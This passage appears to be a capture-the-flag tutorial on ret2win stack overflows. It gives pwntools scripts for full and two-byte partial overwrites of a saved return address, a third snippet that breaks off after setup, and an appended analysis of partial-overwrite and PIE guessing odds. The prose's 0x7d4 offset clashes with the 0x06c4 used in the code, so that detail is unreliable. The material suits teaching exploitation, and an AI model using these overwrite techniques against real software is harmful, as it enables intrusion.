```python
from pwn import *

# Configuration
binary_name = './ret2win'
p = process(binary_name)

# Prepare the payload
offset = 72
ret2win_addr = p64(0x00000000004006c4)
payload = b'A' * offset + ret2win_addr

# Send the payload
p.send(payload)

# Check response
print(p.recvline())
p.close()
```
Off-by-1
In practice this is closer to an off-by-2 on the PC saved on the stack. Instead of overwriting the whole return address, we overwrite only its last 2 bytes with 0x06c4.
```python
from pwn import *

# Configuration
binary_name = './ret2win'
p = process(binary_name)

# Prepare the payload
offset = 72
ret2win_addr = p16(0x06c4)
payload = b'A' * offset + ret2win_addr

# Send the payload
p.send(payload)

# Check response
print(p.recvline())
p.close()
```
Without a leak we do not know the exact address of the win function, but we can read the function's offset from the binary, and since the return address we are overwriting already points to a nearby address, it is easy to take the offset of the win function (0x7d4 in this case) and use just that offset:
```python
from pwn import *

# Configuration
binary_name = './ret2win'
p = process(binary_name)
```
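To make the reasoning behind the two snippets above concrete, here is an added example that is not part of the original page and not HackTricks' own code. It shows why overwriting only the two lowest bytes of the saved PC is enough to land on ret2win at 0x4006c4 (the saved return address and the target share their upper bytes, and on a little-endian target the low bytes are stored first), and it quantifies the caveat of the offset-only variant: when the binary is PIE, only the low 12 bits of an address are fixed by the file offset (the base is page aligned), so a 2-byte partial overwrite still leaves 4 bits unknown and the attempt is probabilistic rather than deterministic. The original saved return address 0x400734 is a constructed placeholder chosen to sit near ret2win; it is not taken from the page.

```python
# Page alignment of a PIE base: the low 12 bits of a runtime code address
# equal the low 12 bits of its offset inside the binary.
PAGE_BITS = 12


def bytes_to_overwrite(saved_ret: int, target: int, width: int = 8) -> int:
    """Number of low-order bytes that differ between saved_ret and target.

    Because the pointer is stored little-endian, these are the first bytes
    of the saved PC in memory, so overwriting exactly this many bytes
    retargets the return while leaving the shared upper bytes intact.
    """
    le_saved = saved_ret.to_bytes(width, "little")
    le_target = target.to_bytes(width, "little")
    n = width
    # Walk down from the most significant byte; stop at the first mismatch.
    while n > 0 and le_saved[n - 1] == le_target[n - 1]:
        n -= 1
    return n


def partial_overwrite(target: int, nbytes: int) -> bytes:
    """Little-endian encoding of the low nbytes of target.

    This is what pwntools' p16/p32/p64 produce for the truncated value,
    e.g. partial_overwrite(0x4006c4, 2) == p16(0x06c4).
    """
    mask = (1 << (8 * nbytes)) - 1
    return (target & mask).to_bytes(nbytes, "little")


def guessed_bits(nbytes: int, page_bits: int = PAGE_BITS) -> int:
    """Bits of an nbytes partial overwrite that the binary's offset does NOT
    determine when the binary is PIE; each such bit halves the success odds."""
    return max(0, nbytes * 8 - page_bits)


def analyse(saved_ret: int, target: int) -> dict:
    """Summarise the partial-overwrite arithmetic for one saved PC / target pair."""
    n = bytes_to_overwrite(saved_ret, target)
    return {
        "bytes": n,
        "payload_tail": partial_overwrite(target, n),
        "pie_guess_bits": guessed_bits(n),
    }


if __name__ == "__main__":
    # Constructed values: a saved PC of 0x400734 (placeholder) and the
    # page's ret2win address 0x4006c4 differ only in their two low bytes.
    info = analyse(0x400734, 0x4006c4)
    print(f"bytes to overwrite : {info['bytes']}")
    print(f"payload tail       : {info['payload_tail']!r}")
    print(f"unknown bits if PIE: {info['pie_guess_bits']}")
```

The `pie_guess_bits` field is the practical reason the offset-only approach in the last snippet is unreliable against a PIE build: with a 2-byte overwrite it succeeds on average one run in sixteen, and a 1-byte overwrite is only deterministic when the target lies within the same 256-byte window as the original return address.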